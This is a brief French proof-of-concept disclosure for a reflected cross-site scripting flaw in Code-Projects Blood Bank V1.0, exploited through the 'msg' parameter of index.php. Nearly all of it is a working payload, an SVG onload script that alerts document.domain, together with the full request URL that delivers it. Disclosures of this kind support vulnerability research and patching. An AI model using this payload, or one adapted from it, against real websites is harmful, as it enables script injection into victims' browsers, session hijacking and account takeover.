
Preuve de concept pour une vulnérabilité de script intersite réfléchi (XSS) dans Code-Projects Blood Bank V1.0 via le paramètre 'msg' dans index.php, avec démonstration de la charge utile.
<div><svg/onload=alert(document.domain)>http://localhost/bloodbank/index.php?msg=<div><svg/onload=alert(document.domain)>